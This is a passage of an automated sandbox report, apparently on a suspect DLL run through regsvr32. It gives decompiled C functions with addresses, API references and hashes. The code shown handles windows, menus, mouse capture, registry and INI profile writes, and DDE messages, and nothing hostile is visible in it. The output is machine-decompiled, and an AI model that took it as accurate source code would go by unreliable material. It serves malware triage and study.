					E100202DF(_t88, 0, _v36 & 0x10000000, 0);
					_t63 =  *((intOrPtr*)(_t85 + 9));
					if(((_t63 ^ _v19) & 0x00000001) != 0 || (_t63 & 0x00000001) != 0 &&  *_t85 != _v28) {
						_push(1);
						_push(0);
						goto L7;
					} else {
						_push( &_v52);
						_push(_a4);
						_push(0x41d);
						if( *((intOrPtr*)( *_t88 + 0x110))() != 0) {
							_push(1);
							_push( &_v52);
							L7:
							_t45 = InvalidateRect( *(_t88 + 0x1c), ??, ??);
						}
					}
				}
				return E100117AE(_t45, _v8);
			}
















                                                                        0x1002b9fe
                                                                        0x1002ba05
                                                                        0x1002ba0a
                                                                        0x1002ba0b
                                                                        0x1002ba0e
                                                                        0x1002ba13
                                                                        0x1002ba1a
                                                                        0x1002ba20
                                                                        0x1002ba23
                                                                        0x1002ba30
                                                                        0x1002ba33
                                                                        0x1002ba36
                                                                        0x1002ba39
                                                                        0x1002ba46
                                                                        0x1002ba5d
                                                                        0x1002ba60
                                                                        0x1002ba72
                                                                        0x1002ba91
                                                                        0x1002ba94
                                                                        0x1002baa4
                                                                        0x1002bab2
                                                                        0x1002babc
                                                                        0x1002babe
                                                                        0x1002bace
                                                                        0x1002bae1
                                                                        0x1002bae6
                                                                        0x1002baf1
                                                                        0x1002bb20
                                                                        0x1002bb22
                                                                        0x00000000
                                                                        0x1002bafe
                                                                        0x1002bb03
                                                                        0x1002bb04
                                                                        0x1002bb09
                                                                        0x1002bb16
                                                                        0x1002bb18
                                                                        0x1002bb1d
                                                                        0x1002bb23
                                                                        0x1002bb26
                                                                        0x1002bb26
                                                                        0x1002bb16
                                                                        0x1002bb2c
                                                                        0x1002bb38

                                                                        APIs
                                                                          • Part of subcall function 100202AB: GetWindowLongA.USER32 ref: 100202B6
                                                                        • SendMessageA.USER32 ref: 1002BA88
                                                                        • SendMessageA.USER32 ref: 1002BA94
                                                                        • SendMessageA.USER32 ref: 1002BAA4
                                                                        • SendMessageA.USER32 ref: 1002BAB2
                                                                        • SendMessageA.USER32 ref: 1002BABC
                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 1002BB26
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$InvalidateLongRectWindow
                                                                        • String ID:
                                                                        • API String ID: 74886174-0
                                                                        • Opcode ID: b589b2aa5c9a58cfbe72108c5627e30e0f5fe5e27cf1599c4597c7e22d4c9a41
                                                                        • Instruction ID: d3f4ff1b3068862bce3741e6c92e476afb765aaf48ff9a7e93f31cae0c4b6ca1
                                                                        • Opcode Fuzzy Hash: b589b2aa5c9a58cfbe72108c5627e30e0f5fe5e27cf1599c4597c7e22d4c9a41
                                                                        • Instruction Fuzzy Hash: D0416CB0600248BFEB11DB94DC95EFEBBB9EF48744F414459FA41AB291C6B0AD45CB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10030A77 Relevance: 9.1, APIs: 6, Instructions: 101windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 77%
                                                                        			E10030A77(void* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				struct tagMSG _v32;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t30;
				void* _t32;
				void* _t34;
				void* _t36;
				intOrPtr* _t37;
				void* _t41;
				intOrPtr _t55;
				void* _t56;
				void* _t57;
				void* _t60;
				void* _t61;
				intOrPtr* _t62;

				_t58 = __edx;
				_t60 = __ecx;
				if(GetCapture() != 0) {
					L20:
					return 0;
				}
				E100220EE(_t61, SetCapture( *( *((intOrPtr*)(_t60 + 0x68)) + 0x1c)));
				if(E100220EE(_t61, GetCapture()) !=  *((intOrPtr*)(_t60 + 0x68))) {
					L19:
					E100308EB(_t60, _t72);
					goto L20;
				} else {
					while(GetMessageA( &_v32, 0, 0, 0) != 0) {
						_t30 = _v32.message - 0x100;
						if(_t30 == 0) {
							__eflags =  *((intOrPtr*)(_t60 + 0x88));
							if( *((intOrPtr*)(_t60 + 0x88)) != 0) {
								E1003075A(_t60, _v32.wParam, 1);
							}
							__eflags = _v32.wParam - 0x1b;
							if(__eflags != 0) {
								L18:
								_t32 = E100220EE(_t61, GetCapture());
								_t72 = _t32 -  *((intOrPtr*)(_t60 + 0x68));
								if(_t32 ==  *((intOrPtr*)(_t60 + 0x68))) {
									continue;
								}
							}
							goto L19;
						}
						_t34 = _t30 - 1;
						if(_t34 == 0) {
							__eflags =  *((intOrPtr*)(_t60 + 0x88));
							if(__eflags != 0) {
								E1003075A(_t60, _v32.wParam, 0);
							}
							goto L18;
						}
						_t36 = _t34 - 0xff;
						if(_t36 == 0) {
							_t55 = _v32.pt;
							_t58 = _v8;
							__eflags =  *((intOrPtr*)(_t60 + 0x88));
							_push(_t55);
							_push(_t55);
							_t37 = _t62;
							 *_t37 = _t55;
							 *((intOrPtr*)(_t37 + 4)) = _v8;
							_t56 = _t60;
							if( *((intOrPtr*)(_t60 + 0x88)) == 0) {
								E1003078E(_t56, 0);
							} else {
								E100306DB(_t56);
							}
							goto L18;
						}
						_t41 = _t36;
						if(_t41 == 0) {
							__eflags =  *((intOrPtr*)(_t60 + 0x88));
							_t57 = _t60;
							if(__eflags == 0) {
								E10030A33(_t61, __eflags);
							} else {
								E10030930(_t57, _t58, 0, _t60, __eflags);
							}
							return 1;
						}
						if(_t41 == 0) {
							goto L19;
						}
						DispatchMessageA( &_v32);
						goto L18;
					}
					_push(_v32.wParam);
					E1003A098();
					goto L19;
				}
			}




















                                                                        0x10030a77
                                                                        0x10030a86
                                                                        0x10030a8c
                                                                        0x10030b66
                                                                        0x00000000
                                                                        0x10030b66
                                                                        0x10030a9f
                                                                        0x10030aaf
                                                                        0x10030b5f
                                                                        0x10030b61
                                                                        0x00000000
                                                                        0x10030ab5
                                                                        0x10030ab7
                                                                        0x10030acf
                                                                        0x10030ad4
                                                                        0x10030b34
                                                                        0x10030b3a
                                                                        0x10030b43
                                                                        0x10030b43
                                                                        0x10030b48
                                                                        0x10030b4c
                                                                        0x10030b4e
                                                                        0x10030b51
                                                                        0x10030b56
                                                                        0x10030b59
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10030b59
                                                                        0x00000000
                                                                        0x10030b4c
                                                                        0x10030ad6
                                                                        0x10030ad7
                                                                        0x10030b1f
                                                                        0x10030b25
                                                                        0x10030b2d
                                                                        0x10030b2d
                                                                        0x00000000
                                                                        0x10030b25
                                                                        0x10030ad9
                                                                        0x10030ade
                                                                        0x10030af8
                                                                        0x10030afb
                                                                        0x10030afe
                                                                        0x10030b04
                                                                        0x10030b05
                                                                        0x10030b06
                                                                        0x10030b08
                                                                        0x10030b0a
                                                                        0x10030b0d
                                                                        0x10030b0f
                                                                        0x10030b18
                                                                        0x10030b11
                                                                        0x10030b11
                                                                        0x10030b11
                                                                        0x00000000
                                                                        0x10030b0f
                                                                        0x10030ae1
                                                                        0x10030ae2
                                                                        0x10030b77
                                                                        0x10030b7d
                                                                        0x10030b7f
                                                                        0x10030b88
                                                                        0x10030b81
                                                                        0x10030b81
                                                                        0x10030b81
                                                                        0x00000000
                                                                        0x10030b8f
                                                                        0x10030aea
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10030af0
                                                                        0x00000000
                                                                        0x10030af0
                                                                        0x10030b6d
                                                                        0x10030b70
                                                                        0x00000000
                                                                        0x10030b70

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Capture$Message$Dispatch
                                                                        • String ID:
                                                                        • API String ID: 3654672037-0
                                                                        • Opcode ID: e6b58cd4b20e416105edfb9c4440ad9ba75aaff5f0d161abc900f8068c81e4c6
                                                                        • Instruction ID: d9b79505f63fc07e8b5b8f3565facbd5cf555a7e12dc77f8d6b56f2636bb58fe
                                                                        • Opcode Fuzzy Hash: e6b58cd4b20e416105edfb9c4440ad9ba75aaff5f0d161abc900f8068c81e4c6
                                                                        • Instruction Fuzzy Hash: 8431B434A02609AFCB63DBB58C65D6FF6E8EF80787F104419B445DA163CB30A980D762
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1002A1CA Relevance: 9.1, APIs: 6, Instructions: 69windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E1002A1CA(void* __ecx) {
				struct HACCEL__* _t25;
				void* _t44;
				void* _t45;
				struct HINSTANCE__* _t46;
				struct HINSTANCE__* _t47;
				struct HINSTANCE__* _t48;

				_t44 = __ecx;
				_t40 = __ecx + 0x60;
				_t25 =  *(__ecx + 0x60);
				_t45 = 0;
				if( *((intOrPtr*)(_t25 - 0xc)) == 0) {
					_t25 = E10006A60(_t40,  *((intOrPtr*)(__ecx + 0x3c)));
				}
				if( *(_t44 + 0x44) != _t45 &&  *((intOrPtr*)(_t44 + 0x2c)) == _t45) {
					_t48 =  *(E100373B5() + 0xc);
					 *((intOrPtr*)(_t44 + 0x2c)) = LoadMenuA(_t48,  *(_t44 + 0x44) & 0x0000ffff);
					_t25 = LoadAcceleratorsA(_t48,  *(_t44 + 0x44) & 0x0000ffff);
					 *(_t44 + 0x30) = _t25;
					_t45 = 0;
				}
				if( *(_t44 + 0x40) != _t45 &&  *((intOrPtr*)(_t44 + 0x34)) == _t45) {
					_t47 =  *(E100373B5() + 0xc);
					 *((intOrPtr*)(_t44 + 0x34)) = LoadMenuA(_t47,  *(_t44 + 0x40) & 0x0000ffff);
					_t25 = LoadAcceleratorsA(_t47,  *(_t44 + 0x40) & 0x0000ffff);
					 *(_t44 + 0x38) = _t25;
					_t45 = 0;
				}
				if( *(_t44 + 0x48) != _t45 &&  *((intOrPtr*)(_t44 + 0x24)) == _t45) {
					_t46 =  *(E100373B5() + 0xc);
					 *((intOrPtr*)(_t44 + 0x24)) = LoadMenuA(_t46,  *(_t44 + 0x48) & 0x0000ffff);
					_t25 = LoadAcceleratorsA(_t46,  *(_t44 + 0x48) & 0x0000ffff);
					 *(_t44 + 0x28) = _t25;
				}
				return _t25;
			}









                                                                        0x1002a1cd
                                                                        0x1002a1cf
                                                                        0x1002a1d2
                                                                        0x1002a1d4
                                                                        0x1002a1da
                                                                        0x1002a1df
                                                                        0x1002a1df
                                                                        0x1002a1f3
                                                                        0x1002a1ff
                                                                        0x1002a20a
                                                                        0x1002a213
                                                                        0x1002a215
                                                                        0x1002a218
                                                                        0x1002a218
                                                                        0x1002a21d
                                                                        0x1002a229
                                                                        0x1002a234
                                                                        0x1002a23d
                                                                        0x1002a23f
                                                                        0x1002a242
                                                                        0x1002a242
                                                                        0x1002a247
                                                                        0x1002a253
                                                                        0x1002a25e
                                                                        0x1002a267
                                                                        0x1002a269
                                                                        0x1002a269
                                                                        0x1002a270

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Load$AcceleratorsMenu
                                                                        • String ID:
                                                                        • API String ID: 144087665-0
                                                                        • Opcode ID: 62af814d51333b06cd62be60a646d7531518e2420bbbd48c9c7e9b7b2b0652c4
                                                                        • Instruction ID: 79ec512449ce6a4c7bf2710ae8ff5bed15bebc86ac40dbf708adfd4365bfde7a
                                                                        • Opcode Fuzzy Hash: 62af814d51333b06cd62be60a646d7531518e2420bbbd48c9c7e9b7b2b0652c4
                                                                        • Instruction Fuzzy Hash: 8821EA75401B18DFC3B0EF6A9940937F3F8FF09651751446FEA8A86912DA36F890DB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1002B105 Relevance: 9.1, APIs: 6, Instructions: 68COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E1002B105(struct HWND__* _a4, struct HWND__** _a8) {
				struct HWND__* _t7;
				void* _t13;
				struct HWND__** _t15;
				struct HWND__* _t16;
				struct HWND__* _t17;
				struct HWND__* _t18;

				_t18 = _a4;
				_t17 = _t18;
				if(_t18 != 0) {
					L5:
					if((GetWindowLongA(_t17, 0xfffffff0) & 0x40000000) == 0) {
						L8:
						_t16 = _t17;
						_t7 = _t17;
						if(_t17 == 0) {
							L10:
							if(_t18 == 0 && _t17 != 0) {
								_t17 = GetLastActivePopup(_t17);
							}
							_t15 = _a8;
							if(_t15 != 0) {
								if(_t16 == 0 || IsWindowEnabled(_t16) == 0 || _t16 == _t17) {
									 *_t15 =  *_t15 & 0x00000000;
								} else {
									 *_t15 = _t16;
									EnableWindow(_t16, 0);
								}
							}
							return _t17;
						} else {
							goto L9;
						}
						do {
							L9:
							_t16 = _t7;
							_t7 = GetParent(_t7);
						} while (_t7 != 0);
						goto L10;
					}
					_t17 = GetParent(_t17);
					L7:
					if(_t17 != 0) {
						goto L5;
					}
					goto L8;
				}
				_t13 = E1002B0CC();
				if(_t13 != 0) {
					L4:
					_t17 =  *(_t13 + 0x1c);
					goto L7;
				}
				_t13 = E10006C53();
				if(_t13 != 0) {
					goto L4;
				}
				_t17 = 0;
				goto L8;
			}









                                                                        0x1002b10d
                                                                        0x1002b115
                                                                        0x1002b117
                                                                        0x1002b134
                                                                        0x1002b142
                                                                        0x1002b14d
                                                                        0x1002b14f
                                                                        0x1002b151
                                                                        0x1002b153
                                                                        0x1002b15e
                                                                        0x1002b160
                                                                        0x1002b16d
                                                                        0x1002b16d
                                                                        0x1002b16f
                                                                        0x1002b175
                                                                        0x1002b179
                                                                        0x1002b197
                                                                        0x1002b18a
                                                                        0x1002b18d
                                                                        0x1002b18f
                                                                        0x1002b18f
                                                                        0x1002b179
                                                                        0x1002b1a0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1002b155
                                                                        0x1002b155
                                                                        0x1002b156
                                                                        0x1002b158
                                                                        0x1002b15a
                                                                        0x00000000
                                                                        0x1002b155
                                                                        0x1002b147
                                                                        0x1002b149
                                                                        0x1002b14b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1002b14b
                                                                        0x1002b119
                                                                        0x1002b120
                                                                        0x1002b12f
                                                                        0x1002b12f
                                                                        0x00000000
                                                                        0x1002b12f
                                                                        0x1002b122
                                                                        0x1002b129
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1002b12b
                                                                        0x00000000

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                                                        • String ID:
                                                                        • API String ID: 670545878-0
                                                                        • Opcode ID: b64e7204216b1f048a42a3b80a98cdaf99d57a40f09b93da801bfd405b8b7097
                                                                        • Instruction ID: ef498eb2053f32fc83163eb1be06eb9c016c70d7a0359ba6d8f1e9348af6cf1d
                                                                        • Opcode Fuzzy Hash: b64e7204216b1f048a42a3b80a98cdaf99d57a40f09b93da801bfd405b8b7097
                                                                        • Instruction Fuzzy Hash: E111A332601F764FD362DA6AACA4B2B77DCDF41BD1FD20159EC04D7211DB60EC104290
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1002B501 Relevance: 9.1, APIs: 6, Instructions: 57registryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E1002B501(intOrPtr __ecx, CHAR* _a4, char* _a8, char* _a12) {
				long _t21;
				void* _t28;

				if( *((intOrPtr*)(__ecx + 0x50)) == 0) {
					return WritePrivateProfileStringA(_a4, _a8, _a12,  *(__ecx + 0x64));
				}
				if(_a8 != 0) {
					_t28 = E10035959(__ecx, _a4);
					if(_a12 != 0) {
						if(_t28 == 0) {
							L3:
							return 0;
						}
						_t21 = RegSetValueExA(_t28, _a8, 0, 1, _a12, lstrlenA(_a12) + 1);
						L10:
						RegCloseKey(_t28);
						return 0 | _t21 == 0x00000000;
					}
					if(_t28 == 0) {
						goto L3;
					}
					_t21 = RegDeleteValueA(_t28, _a8);
					goto L10;
				}
				_t28 = E100358C8(__ecx);
				if(_t28 != 0) {
					_t21 = RegDeleteKeyA(_t28, _a4);
					goto L10;
				}
				goto L3;
			}





                                                                        0x1002b50a
                                                                        0x00000000
                                                                        0x1002b58b
                                                                        0x1002b510
                                                                        0x1002b539
                                                                        0x1002b53b
                                                                        0x1002b54f
                                                                        0x1002b51d
                                                                        0x00000000
                                                                        0x1002b51d
                                                                        0x1002b567
                                                                        0x1002b56d
                                                                        0x1002b570
                                                                        0x00000000
                                                                        0x1002b57a
                                                                        0x1002b53f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1002b545
                                                                        0x00000000
                                                                        0x1002b545
                                                                        0x1002b517
                                                                        0x1002b51b
                                                                        0x1002b525
                                                                        0x00000000
                                                                        0x1002b525
                                                                        0x00000000

                                                                        APIs
                                                                        • RegDeleteKeyA.ADVAPI32(00000000,?), ref: 1002B525
                                                                        • RegDeleteValueA.ADVAPI32(00000000,00000000,?,00000000), ref: 1002B545
                                                                        • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,10024C29,?), ref: 1002B570
                                                                          • Part of subcall function 100358C8: RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?,00000000,00000000), ref: 100358F6
                                                                          • Part of subcall function 100358C8: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10035919
                                                                          • Part of subcall function 100358C8: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,00000000,?), ref: 10035935
                                                                          • Part of subcall function 100358C8: RegCloseKey.ADVAPI32(?), ref: 10035945
                                                                          • Part of subcall function 100358C8: RegCloseKey.ADVAPI32(?), ref: 1003594F
                                                                        • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 1002B58B
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Close$CreateDelete$OpenPrivateProfileStringValueWrite
                                                                        • String ID:
                                                                        • API String ID: 1886894508-0
                                                                        • Opcode ID: cbf87bc0068c303cc6394e99f804432e3955d1a9386c7571ee80164618b64494
                                                                        • Instruction ID: c8f527a64b8234d0edd8db9930868310c0db2fd70ee1d53d59517915cf010f6f
                                                                        • Opcode Fuzzy Hash: cbf87bc0068c303cc6394e99f804432e3955d1a9386c7571ee80164618b64494
                                                                        • Instruction Fuzzy Hash: D1114832401E79FFDB128F61DC48F9E3BA9EF043A1F814510FD049D061CB328A61AB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10031F4A Relevance: 9.1, APIs: 6, Instructions: 56stringwindowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 46%
                                                                        			E10031F4A(void* __ebx, void* __ecx, void* __edi, void* __esi, struct HWND__* _a4, intOrPtr _a8) {
				intOrPtr _v8;
				char _v528;
				void* _v532;
				char _v536;
				intOrPtr _t15;
				long _t22;
				void* _t25;
				void* _t29;

				_t15 =  *0x1004c470; // 0x303bb91f
				_v8 = _t15;
				_push( &_v532);
				_push( &_v536);
				_push(_a8);
				_push(0x3e8);
				_t29 = __ecx;
				L1001CA38();
				if(lstrlenA(GlobalLock(_v532)) < 0x208) {
					_t22 = GlobalUnlock(_v532);
					_push(_v532);
					_push(0x8000);
					_push(0x3e4);
					_push(0x3e8);
					_push(_a8);
					L1001CA32();
					PostMessageA(_a4, 0x3e4,  *(_t29 + 0x1c), _t22);
					if(E100203CE(_t29) != 0) {
						_t25 = E100373B5();
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t25 + 4)))) + 0xa0))( &_v528);
					}
				}
				return E100117AE(0, _v8);
			}











                                                                        0x10031f53
                                                                        0x10031f5a
                                                                        0x10031f63
                                                                        0x10031f6a
                                                                        0x10031f6b
                                                                        0x10031f73
                                                                        0x10031f74
                                                                        0x10031f76
                                                                        0x10031f93
                                                                        0x10031f9c
                                                                        0x10031fa2
                                                                        0x10031fad
                                                                        0x10031fb2
                                                                        0x10031fb3
                                                                        0x10031fb4
                                                                        0x10031fb7
                                                                        0x10031fc4
                                                                        0x10031fd4
                                                                        0x10031fd6
                                                                        0x10031fe9
                                                                        0x10031fe9
                                                                        0x10031fd4
                                                                        0x10031ffc

                                                                        APIs
                                                                        • UnpackDDElParam.USER32 ref: 10031F76
                                                                        • GlobalLock.KERNEL32 ref: 10031F81
                                                                        • lstrlenA.KERNEL32(00000000), ref: 10031F88
                                                                        • GlobalUnlock.KERNEL32(?), ref: 10031F9C
                                                                        • ReuseDDElParam.USER32(?,000003E8,000003E4,00008000,?), ref: 10031FB7
                                                                        • PostMessageA.USER32 ref: 10031FC4
                                                                          • Part of subcall function 100203CE: IsWindowEnabled.USER32(?), ref: 100203D7
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: GlobalParam$EnabledLockMessagePostReuseUnlockUnpackWindowlstrlen
                                                                        • String ID:
                                                                        • API String ID: 462239228-0
                                                                        • Opcode ID: 9b3d271c77589773dafac36f7ca5bc7fab3ad5ea6926df52b529a664096dacb0
                                                                        • Instruction ID: bfbb9d00b13f65a0ab326070f2ebd1bafe94df8b281a4b7973d805b3987b007f
                                                                        • Opcode Fuzzy Hash: 9b3d271c77589773dafac36f7ca5bc7fab3ad5ea6926df52b529a664096dacb0
                                                                        • Instruction Fuzzy Hash: 8D111C3554121CAFDB12DFA1DC88DDE7BB9FF55351F0045A5F809EA262DA34DE808B60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10029BA4 Relevance: 9.0, APIs: 6, Instructions: 48windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E10029BA4(struct HWND__* _a4) {
				struct HWND__* _t3;
				struct HWND__* _t6;
				struct HWND__* _t11;
				struct HWND__* _t14;

				_t3 = GetFocus();
				_t14 = _t3;
				if(_t14 != 0) {
					_t11 = _a4;
					if(_t14 == _t11) {
						L10:
						return _t3;
					}
					if(E10029A8E(_t14, 3) != 0) {
						L5:
						if(_t11 == 0 || (GetWindowLongA(_t11, 0xfffffff0) & 0x40000000) == 0) {
							L8:
							_t3 = SendMessageA(_t14, 0x14f, 0, 0);
							goto L9;
						} else {
							_t6 = GetParent(_t11);
							_t3 = GetDesktopWindow();
							if(_t6 == _t3) {
								L9:
								goto L10;
							}
							goto L8;
						}
					}
					_t3 = GetParent(_t14);
					_t14 = _t3;
					if(_t14 == _t11) {
						goto L9;
					}
					_t3 = E10029A8E(_t14, 2);
					if(_t3 == 0) {
						goto L9;
					}
					goto L5;
				}
				return _t3;
			}







                                                                        0x10029ba5
                                                                        0x10029bab
                                                                        0x10029baf
                                                                        0x10029bb2
                                                                        0x10029bb8
                                                                        0x10029c16
                                                                        0x00000000
                                                                        0x10029c16
                                                                        0x10029bcb
                                                                        0x10029be2
                                                                        0x10029be4
                                                                        0x10029c05
                                                                        0x10029c0f
                                                                        0x00000000
                                                                        0x10029bf6
                                                                        0x10029bf7
                                                                        0x10029bfb
                                                                        0x10029c03
                                                                        0x10029c15
                                                                        0x00000000
                                                                        0x10029c15
                                                                        0x00000000
                                                                        0x10029c03
                                                                        0x10029be4
                                                                        0x10029bce
                                                                        0x10029bd0
                                                                        0x10029bd4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10029bd9
                                                                        0x10029be0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10029be0
                                                                        0x10029c18

                                                                        APIs
                                                                        • GetFocus.USER32 ref: 10029BA5
                                                                          • Part of subcall function 10029A8E: GetWindowLongA.USER32 ref: 10029AA7
                                                                        • GetParent.USER32(00000000), ref: 10029BCE
                                                                          • Part of subcall function 10029A8E: GetClassNameA.USER32(00000000,?,0000000A), ref: 10029AC2
                                                                          • Part of subcall function 10029A8E: lstrcmpiA.KERNEL32(?,combobox), ref: 10029AD1
                                                                        • GetWindowLongA.USER32 ref: 10029BE9
                                                                        • GetParent.USER32(10032120), ref: 10029BF7
                                                                        • GetDesktopWindow.USER32 ref: 10029BFB
                                                                        • SendMessageA.USER32 ref: 10029C0F
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Window$LongParent$ClassDesktopFocusMessageNameSendlstrcmpi
                                                                        • String ID:
                                                                        • API String ID: 2818563221-0
                                                                        • Opcode ID: e89a53c623c721cb0c3fcde6a2588c450b9b76455553080e70e491aeb3ad2bbb
